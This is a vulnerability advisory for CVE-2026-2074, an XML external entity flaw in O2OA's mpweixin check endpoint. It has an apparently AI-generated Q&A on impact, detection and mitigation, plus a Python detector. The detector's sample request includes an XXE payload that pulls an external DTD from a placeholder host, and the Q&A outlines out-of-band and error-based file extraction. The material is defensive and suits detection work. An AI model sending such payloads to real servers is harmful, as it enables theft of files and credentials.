CVE-2026-2074
XML External Entity Injection in O2OA HTTP POST Handler

Publication date: 2026-02-07

Last updated on: 2026-04-29

Assigner: VulDB

Description
A vulnerability was identified in O2OA up to 9.0.0. It affects an unknown function of the file /x_program_center/jaxrs/mpweixin/check in the component HTTP POST Request Handler. The manipulation leads to an XML external entity reference. The attack can be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
Meta Information
Published: 2026-02-07
Last Modified: 2026-04-29
Generated: 2026-05-27
AI Q&A: 2026-02-07
EPSS Evaluated: 2026-05-25
Affected Vendors & Products (1 associated CPE)
Vendor: zoneland
Product: o2oa
Version / Range: up to 9.0.0 (inclusive)
CWE
CWE-610: The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere.
CWE-611: The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-2074 is an XML External Entity (XXE) injection vulnerability found in the O2OA development platform versions 6.1.0 through 9.0.0. It exists in the HTTP POST Request Handler component, specifically in the endpoint /x_program_center/jaxrs/mpweixin/check. The vulnerability arises because the XML parser used by O2OA improperly processes XML documents containing external entity references, allowing an attacker to craft malicious XML payloads that reference external DTD files.

An unauthenticated attacker can exploit this vulnerability remotely by sending a specially crafted HTTP POST request containing XML with external entity references. This triggers the XML parser to load and process the external entities, which can lead to reading arbitrary files on the server or performing out-of-band data exfiltration.

The vulnerability leverages the Java XML parser's behavior, which restricts internal DTD entity nesting but does not prevent exploitation via external DTD files. Attackers can use parameter entity nesting in the external DTD to trigger error-based feedback from the parser, enabling them to extract sensitive information. [1, 2, 3, 4]


How can this vulnerability impact me?

This vulnerability can impact you by allowing attackers to read arbitrary files on the affected server, potentially exposing sensitive information such as configuration files, credentials, or other private data.

Additionally, the vulnerability can be used for out-of-band data exfiltration, meaning attackers can extract data remotely without direct access to the server.

The flaw affects the confidentiality, integrity, and availability of the system, as attackers might gain unauthorized access to sensitive data, manipulate data, or disrupt service.

Since the exploit is publicly available and requires no authentication, the risk of exploitation is significant, especially if the vulnerable O2OA platform is exposed to untrusted networks.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by monitoring for HTTP POST requests to the endpoint /x_program_center/jaxrs/mpweixin/check containing XML payloads with external entity references such as <!DOCTYPE, <!ENTITY, SYSTEM, or PUBLIC.

One approach is to inspect network traffic or logs for suspicious XML data that includes these keywords, which indicate attempts to exploit the XML External Entity (XXE) injection.

Example commands to detect such attempts could include using tools like tcpdump or tshark to capture HTTP POST requests and grep for suspicious XML content.

- Using tcpdump to capture HTTP POST requests to the vulnerable endpoint: tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep '/x_program_center/jaxrs/mpweixin/check'
- Using tshark to filter HTTP POST requests containing XML external entity keywords: tshark -Y 'http.request.method == "POST" && http contains "<!DOCTYPE"' -T fields -e http.file_data

Additionally, Web Application Firewalls (WAFs) can be configured to detect and block XML payloads containing these keywords to help identify exploitation attempts. [3]
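As an added example (not code from this page or from O2OA), the request-inspection logic the answer above describes, run over constructed sample requests: it flags POSTs to the endpoint named in the advisory whose body carries a DOCTYPE or ENTITY declaration, and counts SYSTEM/PUBLIC only inside such a declaration so that ordinary element text does not raise false alerts. The host name and DTD URL in the samples are placeholders.

```python
import re

# Endpoint named in the advisory.
VULN_PATH = "/x_program_center/jaxrs/mpweixin/check"

# Indicators of a DTD-based payload. SYSTEM/PUBLIC are only counted inside a
# DOCTYPE or ENTITY declaration, so ordinary element text does not raise alerts.
XXE_PATTERNS = {
    "doctype": re.compile(r"<!DOCTYPE\b", re.I),
    "entity": re.compile(r"<!ENTITY\b", re.I),
    "external_id": re.compile(r"<!(?:DOCTYPE|ENTITY)\b[^>]*\b(?:SYSTEM|PUBLIC)\b", re.I | re.S),
    "parameter_entity": re.compile(r"<!ENTITY\s+%", re.I),  # external-DTD nesting from the Q&A
}


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, body); None if malformed."""
    head, sep, body = raw.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split(" ")
    if not sep or len(parts) < 2:
        return None
    return parts[0], parts[1].split("?", 1)[0], body


def inspect_request(raw):
    """Return the indicator names found in a POST to the O2OA endpoint, else None."""
    parsed = parse_request(raw)
    if parsed is None:
        return None
    method, path, body = parsed
    if method != "POST" or path != VULN_PATH:
        return None
    hits = [name for name, pat in XXE_PATTERNS.items() if pat.search(body)]
    return hits or None


# Constructed sample requests (not captured traffic); host and DTD URL are placeholders.
HEAD = "POST " + VULN_PATH + " HTTP/1.1\r\nHost: o2oa.example\r\nContent-Type: text/xml\r\n\r\n"
BENIGN = HEAD + "<xml><ToUserName>u1</ToUserName><MsgType>text</MsgType></xml>"
SUSPICIOUS = HEAD + (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE xml [ <!ENTITY % ext SYSTEM "http://dtd.example.invalid/ext.dtd"> %ext; ]>\n'
    "<xml><ToUserName>&data;</ToUserName></xml>"
)
OTHER_PATH = "POST /x_program_center/jaxrs/other HTTP/1.1\r\n\r\n<!DOCTYPE x [<!ENTITY a \"b\">]><x/>"

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS), ("other", OTHER_PATH)):
        print(label, inspect_request(req))
```

The same patterns can be fed to a WAF rule set or a log pipeline; a hit on the parameter_entity indicator is the strongest signal, because legitimate XML sent to this endpoint has no reason to declare parameter entities.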


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting outbound network connections from the O2OA server to prevent it from accessing external HTTP services, which blocks out-of-band data exfiltration.

Configuring a Web Application Firewall (WAF) to detect and block XML payloads containing keywords such as `<!DOCTYPE`, `<!ENTITY`, `SYSTEM`, or `PUBLIC` can help prevent exploitation.

At the application level, modifying the XML processing logic to disable DTD processing and external entity resolution is recommended to effectively prevent XXE attacks.

Since no official patch or fix is currently available, consider isolating or replacing the affected product if possible.

